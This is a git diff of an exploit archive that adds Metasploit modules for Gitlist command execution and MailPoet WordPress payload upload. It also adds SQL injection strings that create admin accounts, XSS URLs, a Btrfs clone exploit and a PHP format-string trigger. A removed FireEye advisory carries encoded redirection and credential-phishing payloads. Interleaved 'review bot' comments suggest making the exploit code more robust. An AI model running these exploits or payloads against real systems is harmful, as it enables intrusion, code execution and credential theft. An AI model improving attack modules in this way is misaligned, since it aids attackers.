diff --git a/files.csv b/files.csv
index 584752014..3b4816867 100755
--- a/files.csv
+++ b/files.csv
@@ -30579,7 +30579,6 @@ id,file,description,date,author,platform,type,port
 33951,platforms/windows/dos/33951.txt,"Baidu Spark Browser v26.5.9999.3511 - Remote Stack Overflow Vulnerability (DoS)",2014-07-02,LiquidWorm,windows,dos,0
 33953,platforms/php/webapps/33953.txt,"Zurmo CRM - Persistent XSS Vulnerability",2014-07-02,Provensec,php,webapps,80
 33954,platforms/php/webapps/33954.txt,"Kerio Control 8.3.1 - Blind SQL Injection",2014-07-02,"Khashayar Fereidani",php,webapps,4081
-33955,platforms/php/webapps/33955.txt,"FireEye Malware Analysis System (MAS) 6.4.1 - Multiple Vulnerabilities",2014-07-02,kmkz,php,webapps,0
 33957,platforms/php/webapps/33957.txt,"kloNews 2.0 'cat.php' Cross Site Scripting Vulnerability",2010-01-20,"cr4wl3r ",php,webapps,0
 33958,platforms/cgi/webapps/33958.txt,"Digital Factory Publique! 2.3 'sid' Parameter SQL Injection Vulnerability",2010-05-06,"Christophe de la Fuente",cgi,webapps,0
 33959,platforms/asp/webapps/33959.txt,"Multiple Consona Products 'n6plugindestructor.asp' Cross Site Scripting Vulnerability",2010-05-07,"Ruben Santamarta ",asp,webapps,0
@@ -30610,3 +30609,24 @@ id,file,description,date,author,platform,type,port
 33985,platforms/php/webapps/33985.txt,"NPDS Revolution 10.02 'topic' Parameter Cross Site Scripting Vulnerability",2010-05-13,"High-Tech Bridge SA",php,webapps,0
 33986,platforms/php/webapps/33986.txt,"PHP File Uploader Remote File Upload Vulnerability",2010-01-03,indoushka,php,webapps,0
 33987,platforms/php/webapps/33987.txt,"PHP Banner Exchange 1.2 'signupconfirm.php' Cross Site Scripting Vulnerability",2010-01-03,indoushka,php,webapps,0
+33988,platforms/php/remote/33988.txt,"PHP 5.x 'ext/phar/stream.c' and 'ext/phar/dirstream.c' Multiple Format String Vulnerabilities",2010-05-14,"Stefan Esser",php,remote,0
+33989,platforms/windows/remote/33989.rb,"Oracle Event Processing FileUploadServlet Arbitrary File Upload",2014-07-07,metasploit,windows,remote,9002
+33990,platforms/multiple/remote/33990.rb,"Gitlist Unauthenticated Remote Command Execution",2014-07-07,metasploit,multiple,remote,80
+33991,platforms/php/remote/33991.rb,"Wordpress MailPoet (wysija-newsletters) Unauthenticated File Upload",2014-07-07,metasploit,php,remote,80
+33992,platforms/asp/webapps/33992.txt,"Platnik 8.1.1 Multiple SQL Injection Vulnerabilities",2010-05-17,podatnik386,asp,webapps,0
+33993,platforms/php/webapps/33993.txt,"Planet Script 1.x 'idomains.php' Cross Site Scripting Vulnerability",2010-05-14,Mr.ThieF,php,webapps,0
+33994,platforms/php/webapps/33994.txt,"PonVFTP Insecure Cookie Authentication Bypass Vulnerability",2010-05-17,SkuLL-HackeR,php,webapps,0
+33995,platforms/multiple/webapps/33995.txt,"Blaze Apps 1.x SQL Injection and HTML Injection Vulnerabilities",2010-01-19,"AmnPardaz Security Research Team",multiple,webapps,0
+33996,platforms/ios/webapps/33996.txt,"Photo Org WonderApplications 8.3 iOS - File Include Vulnerability",2014-07-07,Vulnerability-Lab,ios,webapps,0
+33997,platforms/php/webapps/33997.txt,"NPDS Revolution 10.02 'download.php' Cross Site Scripting Vulnerability",2010-05-18,"High-Tech Bridge 
SA",php,webapps,0
+33998,platforms/php/webapps/33998.html,"JoomlaTune JComments 2.1 Joomla! Component 'ComntrNam' Parameter Cross-Site Scripting Vulnerability",2010-05-18,"High-Tech Bridge SA",php,webapps,0
+33999,platforms/php/webapps/33999.txt,"Mobile Chat 2.0.2 'chatsmileys.php' Cross Site Scripting Vulnerability",2010-01-18,indoushka,php,webapps,0
+34000,platforms/multiple/webapps/34000.txt,"Serialsystem 1.0.4 BETA 'list' Parameter Cross Site Scripting Vulnerability",2010-01-18,indoushka,multiple,webapps,0
+34001,platforms/linux/local/34001.c,"Linux Kernel 2.6.x Btrfs Cloned File Security Bypass Vulnerability",2010-05-18,"Dan Rosenberg",linux,local,0
+34002,platforms/windows/remote/34002.c,"TeamViewer 5.0.8232 Remote Buffer Overflow Vulnerability",2010-05-18,"fl0 fl0w",windows,remote,0
+34003,platforms/php/webapps/34003.txt,"Percha Image Attach 1.1 Component for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
+34004,platforms/php/webapps/34004.txt,"Percha Fields Attach 1.0 Component for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
+34005,platforms/php/webapps/34005.txt,"Percha Downloads Attach 1.1 Component for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
+34006,platforms/php/webapps/34006.txt,"Percha Gallery Component 1.6 Beta for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
+34007,platforms/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Security Vulnerabilities",2014-07-08,"Deepak Rathore",php,webapps,0
+34008,platforms/php/webapps/34008.txt,"Percha Multicategory Article Component 0.6 for Joomla! index.php controller Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
diff --git a/platforms/asp/webapps/33992.txt b/platforms/asp/webapps/33992.txt new file mode 100755 index 000000000..01bbfa683 --- /dev/null +++ b/platforms/asp/webapps/33992.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/40201/info + +Platnik is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Platnik 8.01.001 is affected; other versions may also be vulnerable. + +INSERT INTO dbo.UZYTKOWNIK VALUES('LOGIN', 'TEST', 'TEST', 'password hash', '2010-02-28 15:46:48', null, 'A', null)-- +INSERT INTO dbo.UPRAWNIENIA VALUES(id_user, id_platnik)-- +or 1=1-- \ No newline at end of file diff --git a/platforms/ios/webapps/33996.txt b/platforms/ios/webapps/33996.txt new file mode 100755 index 000000000..a158bddd4 --- /dev/null +++ b/platforms/ios/webapps/33996.txt 
@@ -0,0 +1,237 @@ +Document Title: +=============== +Photo Org WonderApplications v8.3 iOS - File Include Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1277 + + +Release Date: +============= +2014-07-04 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1277 + + +Common Vulnerability Scoring System: +==================================== +7.1 + + +Product & Service Introduction: +=============================== +Create great photo albums and video diaries with PhotoOrg. Keep your photo album and video diary secured with passwords. +Share your photo albums and video diary on Facebook, Twitter, Youtube, Picasa, Flickr and MySpace with family, friends +and business associates. + +Photo Editor with the following ability: +-Over eleven photo effects +-Four different photo enhancer +-Rotate and flip photo +-Crop photo +-Change photo brightness +-Change photo Contrast +-Change photo saturation +-Change photo sharpness +-Draw on photo with different colors +-Write text on your photo +-Remove red eyes +-Whiten photo +-Remove blemish on photo + +Features: +-view your pictures and videos using your browser +-upload your picture and video using your browser +-upload video to Youtube, Picasa, Facebook, Twitter, Flickr and MySpace +-upload multiple pictures to Facebook, Twitter, Flickr and MySpace +-Keep your photo and videos organized the way you like it +-Keep your photo and video secured with password +-copy your photo and video from anywhere and paste them into the application + + +( Copy of the Homepage: https://itunes.apple.com/us/app/photo-org/id330740156 ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered a local file include vulnerability in the official WonderApplications Photo Org v8.3 iOS web-application. 
+ + +Vulnerability Disclosure Timeline: +================================== +2014-07-04: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +WonderApplications +Product: Photo Org L - iOS Mobile Application 8.3 + + +Exploitation Technique: +======================= +Local + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +A local file include web vulnerability has been discovered in the official WonderApplications Photo Org v8.3 iOS web-application. +The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific +path commands to compromise the mobile web-application. + +The web vulnerability is located in the `filename` value of the `uploadMedia` (uploadfile) module. Remote attackers are able to inject +own files with malicious `filename` values in the `uploadMedia` POST method request to compromise the mobile web-application. The local +file/path include execution occcurs in the index file/folder list context next to the vulnerable name/path value. The attacker is able +to inject the local file request by usage of the available `wifi interface` for file exchange/share. + +Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute +different local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to +inject is POST. + +The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) +count of 7.1. Exploitation of the local file include web vulnerability requires no privileged web-application user account but low +user interaction. 
Successful exploitation of the local file include web vulnerability results in mobile application or connected +device component compromise. + + +Request Method(s): + [+] [POST] + +Vulnerable Service(s): + [+] WonderApplications - WiFi Share + +Vulnerable Module(s): + [+] uploadMedia + +Vulnerable Parameter(s): + [+] filename + +Affected Module(s): + [+] Index File/Folder Dir Listing (http://localhost:[port-x]/) + + +Proof of Concept (PoC): +======================= +The local file inlcude web vulnerability can be exploited by remote attackers with low privileged application user account and without user interaction. +For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + + +PoC: WonderApplications (Photo & Video) - Index- & Sub-Categories + + +

WonderApplications

+abcde +
abcde
+
+abcdef <././/var/mobile/Applications/[LOCAL FILE INCLUDE VULNERABILITY!].png.zip"> +
+ + +--- Poc Session Logs [POST] --- +Status: 200[OK] +POST http://localhost:8080/uploadMedia Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[unknown] Mime Type[unknown] + Request Header: + Host[localhost:8080] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:8080/uploadMedia] + POST-Daten: + POST_DATA[-----------------------------276732337522317 +Content-Disposition: form-data; name="file"; filename="././/var/mobile/Applications/[LOCAL FILE INCLUDE VULNERABILITY!].png.zip" +Content-Type: application/zip +- + +20:40:52.394[62ms][total 79ms] Status: 200[OK] +GET http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[2874] Mime Type[text/html] + Request Header: + Host[localhost:8080] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Connection[keep-alive] + Response Header: + Connection[Keep-Alive] + Content-Type[text/html] + Content-Length[2874] + + + + +Reference(s): +http://localhost:8080/ +http://localhost:8080/uploadMedia +http://localhost:8080/var/mobile/Applications/ + + +Solution - Fix & Patch: +======================= +The local file include web vulnerability bug can be patched by a secure parse and encode of the vulnerable filename value in the upload POST method request. +Encode also the filename value in the file dir listing of the index and sub categories. +Restrict the filename value name input and prevent executions by a secure file filter on upload extension or the name validation itself. 
+ + +Security Risk: +============== +The security risk of the local file include web vulnerability in the filename value is estimated as high. + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either +expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers +are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even +if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation +of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break +any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to +electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website +is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact +(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright ? 2014 | Vulnerability Laboratory [Evolution Security] + + +-- +VULNERABILITY LABORATORY RESEARCH TEAM +DOMAIN: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com + + diff --git a/platforms/linux/local/34001.c b/platforms/linux/local/34001.c new file mode 100755 index 000000000..f5085efbb --- /dev/null +++ b/platforms/linux/local/34001.c @@ -0,0 +1,29 @@ +source: http://www.securityfocus.com/bid/40241/info + +The Linux Kernel is prone to a security-bypass vulnerability that affects the Btrfs filesystem implementation. + +An attacker can exploit this issue to clone a file only open for writing. This may allow attackers to obtain sensitive data or launch further attacks. + +#include +#include +#include +#include + +#define BTRFS_IOC_CLONE _IOW(0x94, 9, int) + +int main(int argc, char * argv[]) +{ + + if(argc < 3) { + printf("Usage: %s [target] [output]\n", argv[0]); + exit(-1); + } + + int output = open(argv[2], O_WRONLY | O_CREAT, 0644); + + /* Note - opened for writing, not reading */ + int target = open(argv[1], O_WRONLY); + + ioctl(output, BTRFS_IOC_CLONE, target); + +} diff --git a/platforms/multiple/remote/33990.rb b/platforms/multiple/remote/33990.rb new file mode 100755 index 000000000..cf79501e0 --- /dev/null +++ b/platforms/multiple/remote/33990.rb 
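Review bot: As rendered here the four `#include` directives at the top of 34001.c carry no header operand, so the file as shown cannot compile; the angle-bracketed names were most likely dropped by the same rendering that stripped the HTML fragments from 33996.txt and 33995.txt in this commit, so confirm the committed file still names the headers that `printf`/`exit` (`<stdio.h>`, `<stdlib.h>`), `open`/`O_WRONLY`/`O_CREAT` (`<fcntl.h>`) and `ioctl`/`_IOW` (`<sys/ioctl.h>`) come from. Separately, both `open` results and the `ioctl` return value are discarded and `main` falls off the end without a return, so someone running this as a regression test against a patched kernel cannot tell a failed open from a clone the kernel rejected; testing each call for `-1` and reporting `perror` output before returning non-zero would make the outcome observable. The usage path's `exit(-1)` also produces exit status 255 where `EXIT_FAILURE` is the conventional value.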
@@ -0,0 +1,119 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Gitlist Unauthenticated Remote Command Execution', + 'Description' => %q{ + This module exploits an unauthenticated remote command execution vulnerability + in version 0.4.0 of Gitlist. The problem exists in the handling of an specially + crafted file name when trying to blame it. + }, + 'License' => MSF_LICENSE, + 'Privileged' => false, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Author' => + [ + 'drone', #discovery/poc by @dronesec + 'Brandon Perry ' #Metasploit module + ], + 'References' => + [ + ['CVE', '2014-4511'], + ['EDB', '33929'], + ['URL', 'http://hatriot.github.io/blog/2014/06/29/gitlist-rce/'] + ], + 'Payload' => + { + 'Space' => 8192, # max length of GET request really + 'BadChars' => "&\x20", + 'DisableNops' => true, + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic telnet python perl bash gawk netcat netcat-e ruby php openssl', + } + }, + 'Targets' => + [ + ['Gitlist 0.4.0', { }] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jun 30 2014' + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']) + ], self.class) + end + + def check + repo = get_repo + + if repo.nil? 
+ return Exploit::CheckCode::Unknown + end + + chk = Rex::Text.encode_base64(rand_text_alpha(rand(32)+5)) + + res = send_command(repo, "echo${IFS}" + chk + "|base64${IFS}--decode") + + if res && res.body + if res.body.include?(Rex::Text.decode_base64(chk)) + return Exploit::CheckCode::Vulnerable + elsif res.body.to_s =~ /sh.*not found/ + return Exploit::CheckCode::Vulnerable + end + end + + Exploit::CheckCode::Safe + end + + def exploit + repo = get_repo + if repo.nil? + fail_with(Failure::Unknown, "#{peer} - Failed to retrieve the remote repository") + end + send_command(repo, payload.encoded) + end + + def get_repo + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, "/") + }) + + unless res + return nil + end + + first_repo = /href="\/gitlist\/(.*)\/"/.match(res.body) + + unless first_repo && first_repo.length >= 2 + return nil + end + + repo_name = first_repo[1] + + repo_name + end + + def send_command(repo, cmd) + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, repo, 'blame', 'master', '""`' + cmd + '`') + }, 1) + + res + end + +end \ No newline at end of file diff --git a/platforms/multiple/webapps/33995.txt b/platforms/multiple/webapps/33995.txt new file mode 100755 index 000000000..0b72b06e5 --- /dev/null +++ b/platforms/multiple/webapps/33995.txt 
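Review bot: `get_repo` finds the repository name with a regex that hardcodes the `/gitlist/` prefix (`/href="\/gitlist\/(.*)\/"/`) even though the page it parses is fetched from the configurable `TARGETURI` option, so an instance served from any other path makes `get_repo` return nil and `check` answer Unknown for a reason the output never states; at minimum document the assumption in the option text, e.g. `OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance (repository links are expected under /gitlist/)', '/'])`. The greedy `(.*)` is also worth a comment, since it captures up to the last `/"` on the matched line. For defenders, `send_command` shows that the injected command travels in the URL path of the `blame/master/...` request, so it is recorded verbatim in ordinary web-server access logs and a backtick inside that path segment is a usable detection signature.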
@@ -0,0 +1,18 @@ +source: http://www.securityfocus.com/bid/40212/info + +Blaze Apps is prone to multiple SQL-injection vulnerabilities and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input. + +An attacker may exploit the HTML-injection issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is displayed, and launch other attacks. + +The attacker may exploit the SQL-injection issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Blaze Apps 1.4.0.051909 and prior are vulnerable. + +HTML Injection + + + +SQL Injection + +aa' OR [SQL] OR 'a'='1 + diff --git a/platforms/multiple/webapps/34000.txt b/platforms/multiple/webapps/34000.txt new file mode 100755 index 000000000..fd7a8ab9f --- /dev/null +++ b/platforms/multiple/webapps/34000.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/40236/info + +Serialsystem is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Serialsystem 1.0.4 BETA is vulnerable; other versions may also be affected. + +http://www.example.com/Serials/upload/?list= \ No newline at end of file diff --git a/platforms/php/remote/33988.txt b/platforms/php/remote/33988.txt new file mode 100755 index 000000000..9f776fc24 --- /dev/null +++ b/platforms/php/remote/33988.txt 
@@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/40173/info + + +PHP is prone to multiple format-string vulnerabilities because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function. + +Attackers can exploit these issues to run arbitrary code within the context of the PHP process. This may allow them to bypass intended security restrictions or gain elevated privileges. + +PHP 5.3 through 5.3.2 are vulnerable. + +$ php -r "fopen('phar:///usr/bin/phar.phar/*%08x-%08x-%08x-%08x-%08x-%08x-%08x-%08x-%08x','r');" \ No newline at end of file diff --git a/platforms/php/remote/33991.rb b/platforms/php/remote/33991.rb new file mode 100755 index 000000000..99850503a --- /dev/null +++ b/platforms/php/remote/33991.rb 
@@ -0,0 +1,143 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::HTTP::Wordpress + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Wordpress MailPoet (wysija-newsletters) Unauthenticated File Upload', + 'Description' => %q{ + The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.8 + is vulnerable to an unauthenticated file upload. The exploit uses the Upload Theme + functionality to upload a zip file containing the payload. The plugin used the + admin_init hook, which is also executed for unauthenticated users when accessing + a specific URL. The developers tried to fix the vulnerablility + in version 2.6.7 but the fix can be bypassed. In PHPs default configuration, + a POST variable overwrites a GET variable in the $_REQUEST array. The plugin + uses $_REQUEST to check for access rights. By setting the POST parameter to + something not beginning with 'wysija_', the check is bypassed. Wordpress uses + the $_GET array to determine the page and is so not affected by this. 
+ }, + 'Author' => + [ + 'Marc-Alexandre Montpas', # initial discovery + 'Christian Mehlmauer' # metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html' ], + [ 'URL', 'http://www.mailpoet.com/security-update-part-2/'], + [ 'URL', 'https://plugins.trac.wordpress.org/changeset/943427/wysija-newsletters/trunk/helpers/back.php'] + ], + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => [ ['wysija-newsletters < 2.6.8', {}] ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jul 1 2014')) + end + + def create_zip_file(theme_name, payload_name) + # the zip file must match the following: + # -) Exactly one folder representing the theme name + # -) A style.css in the theme folder + # -) Additional files in the folder + + content = { + ::File.join(theme_name, 'style.css') => '', + ::File.join(theme_name, payload_name) => payload.encoded + } + + zip_file = Rex::Zip::Archive.new + content.each_pair do |name, content| + zip_file.add_file(name, content) + end + + zip_file.pack + end + + def check + readme_url = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wysija-newsletters', 'readme.txt') + res = send_request_cgi({ + 'uri' => readme_url, + 'method' => 'GET' + }) + # no readme.txt present + if res.nil? || res.code != 200 + return Msf::Exploit::CheckCode::Unknown + end + + # try to extract version from readme + # Example line: + # Stable tag: 2.6.6 + version = res.body.to_s[/stable tag: ([^\r\n"\']+\.[^\r\n"\']+)/i, 1] + + # readme present, but no version number + if version.nil? 
+ return Msf::Exploit::CheckCode::Detected + end + + print_status("#{peer} - Found version #{version} of the plugin") + + if Gem::Version.new(version) < Gem::Version.new('2.6.8') + return Msf::Exploit::CheckCode::Appears + else + return Msf::Exploit::CheckCode::Safe + end + end + + def exploit + theme_name = rand_text_alpha(10) + payload_name = "#{rand_text_alpha(10)}.php" + + zip_content = create_zip_file(theme_name, payload_name) + + uri = normalize_uri(target_uri.path, 'wp-admin', 'admin-post.php') + + data = Rex::MIME::Message.new + data.add_part(zip_content, 'application/x-zip-compressed', 'binary', "form-data; name=\"my-theme\"; filename=\"#{rand_text_alpha(5)}.zip\"") + data.add_part('on', nil, nil, 'form-data; name="overwriteexistingtheme"') + data.add_part('themeupload', nil, nil, 'form-data; name="action"') + data.add_part('Upload', nil, nil, 'form-data; name="submitter"') + data.add_part(rand_text_alpha(10), nil, nil, 'form-data; name="page"') + post_data = data.to_s + + payload_uri = normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wysija', 'themes', theme_name, payload_name) + + print_status("#{peer} - Uploading payload to #{payload_uri}") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => uri, + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'vars_get' => { 'page' => 'wysija_campaigns', 'action' => 'themes' }, + 'data' => post_data + }) + + if res.nil? || res.code != 302 || res.headers['Location'] != 'admin.php?page=wysija_campaigns&action=themes&reload=1&redirect=1' + fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed") + end + + # Files to cleanup (session is dropped in the created folder): + # style.css + # the payload + # the theme folder (manual cleanup) + register_files_for_cleanup('style.css', payload_name) + + print_warning("#{peer} - The theme folder #{theme_name} can not be removed. 
Please delete it manually.") + + print_status("#{peer} - Executing payload #{payload_uri}") + res = send_request_cgi({ + 'uri' => payload_uri, + 'method' => 'GET' + }) + end +end \ No newline at end of file diff --git a/platforms/php/webapps/33955.txt b/platforms/php/webapps/33955.txt deleted file mode 100755 index 9013a183c..000000000 --- a/platforms/php/webapps/33955.txt +++ /dev/null 
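Review bot: In `create_zip_file` the block parameter in `content.each_pair do |name, content|` shadows the `content` hash it iterates; Ruby treats the block parameter as block-local so this happens to work, but it triggers a shadowing warning and reads as though the whole hash were passed to `add_file`, so rename it (`content.each_pair do |name, body| zip_file.add_file(name, body) end`). In `check`, the string captured from the readme goes straight into `Gem::Version.new`, which raises on a malformed version (the regex admits spaces and other characters), turning an odd `Stable tag:` line into an exception rather than `Detected`; guard with `Gem::Version.correct?(version)` first. The final `res = send_request_cgi(...)` in `exploit` assigns a response that is never examined, so the local can be dropped or its status logged. For defenders, the module's own cleanup comment doubles as an indicator: a successful run leaves a random ten-letter theme folder containing `style.css` under `wp-content/uploads/wysija/themes/`, and the upload arrives as a POST to `wp-admin/admin-post.php` with `page=wysija_campaigns&action=themes` in the query string.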
@@ -1,87 +0,0 @@ -# Exploit Title: Fireeye Malware Analysis System multiple vulnerabilities -# Google Dork: none -# Date: 06/05/2014 -# Exploit Author: kmkz (Bourbon Jean-Marie) -# Vendor Homepage: http://www.fireeye.com/fr/fr/ -# Software Link: http://www.fireeye.com/products-and-solutions/ -# Version: 6.4.1 -# CVE : none - -************************************************************* -*[Audit Type] web IHM ONLY / Full black-box audit * -* * -*[Multiples Vulnerabilities] * -* * -* 3 XSS (reflected) * -* 1 CSRF * -* 1 NoSQLi (Json object) * -* 1 PostGreSQL SQLi (Exploitable?) * -* 1 File and Path Disclosure * -* 1 Source code Info-leak * -* * -************************************************************* - - - -[*] XSS: - +First XSS (reflected): - https://192.168.1.50/yara/show_ya_file?name= - PoC : - Redirection: - https://192.168.1.50/yara/show_ya_file?name= - Url encoded redirection payload: - https://192.168.1.50/yara/show_ya_file?name=%3Cbody%20onload%3Ddocument.location%3D(String.fromCharCode(104%2C116%2C116%2C112%2C58%2C47%2C47%2C103%2C111%2C111%2C103%2C108%2C101%2C46%2C99%2C111%2C109))%3E%0A%09 - - Phishing page PoC: - https://192.168.1.50/yara/show_ya_file?name= - Url encoded phishing page payload: - 
https://192.168.1.50/yara/show_ya_file?name=%3Cbody%20onload%3Ddocument.write(String.fromCharCode(60%2C104%2C116%2C109%2C108%2C62%2C60%2C98%2C111%2C100%2C121%2C62%2C60%2C104%2C101%2C97%2C100%2C62%2C60%2C109%2C101%2C116%2C97%2C32%2C99%2C111%2C110%2C116%2C101%2C110%2C116%2C61%2C34%2C116%2C101%2C120%2C116%2C47%2C104%2C116%2C109%2C108%2C59%2C32%2C99%2C104%2C97%2C114%2C115%2C101%2C116%2C61%2C117%2C116%2C102%2C45%2C56%2C34%2C62%2C60%2C47%2C109%2C101%2C116%2C97%2C62%2C60%2C47%2C104%2C101%2C97%2C100%2C62%2C60%2C100%2C105%2C118%2C32%2C115%2C116%2C121%2C108%2C101%2C61%2C34%2C116%2C101%2C120%2C116%2C45%2C97%2C108%2C105%2C103%2C110%2C58%2C32%2C99%2C101%2C110%2C116%2C101%2C114%2C59%2C34%2C62%2C60%2C102%2C111%2C114%2C109%2C32%2C77%2C101%2C116%2C104%2C111%2C100%2C61%2C34%2C80%2C79%2C83%2C84%2C34%2C32%2C65%2C99%2C116%2C105%2C111%2C110%2C61%2C34%2C104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C119%2C119%2C119%2C46%2C103%2C111%2C111%2C103%2C108%2C101%2C46%2C114%2C117%2C34%2C62%2C80%2C104%2C105%2C115%2C104%2C105%2C110%2C103%2C112%2C97%2C103%2C101%2C32%2C58%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C98%2C114%2C47%2C62%2C85%2C115%2C101%2C114%2C110%2C97%2C109%2C101%2C32%2C58%2C60%2C98%2C114%2C32%2C47%2C62%2C32%2C60%2C105%2C110%2C112%2C117%2C116%2C32%2C110%2C97%2C109%2C101%2C61%2C34%2C85%2C115%2C101%2C114%2C34%2C32%2C47%2C62%2C60%2C98%2C114%2C32%2C47%2C62%2C80%2C97%2C115%2C115%2C119%2C111%2C114%2C100%2C32%2C58%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C105%2C110%2C112%2C117%2C116%2C32%2C110%2C97%2C109%2C101%2C61%2C34%2C80%2C97%2C115%2C115%2C119%2C111%2C114%2C100%2C34%2C32%2C116%2C121%2C112%2C101%2C61%2C34%2C112%2C97%2C115%2C115%2C119%2C111%2C114%2C100%2C34%2C32%2C47%2C62%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C105%2C110%2C112%2C117%2C116%2C32%2C110%2C97%2C109%2C101%2C61%2C34%2C86%2C97%2C108%2C105%2C100%2C34%2C32%2C118%2C97%2C108%2C117%2C101%2C61%2C34%2C79%2C107%2C32%2C33%2C34%2C116%2C121%2C112%2C101%2C61%2C34%2C115%2C117%2C98%2C109%2C105%2C116%2C34%2C32%2C47%2C62%2C32%2C6
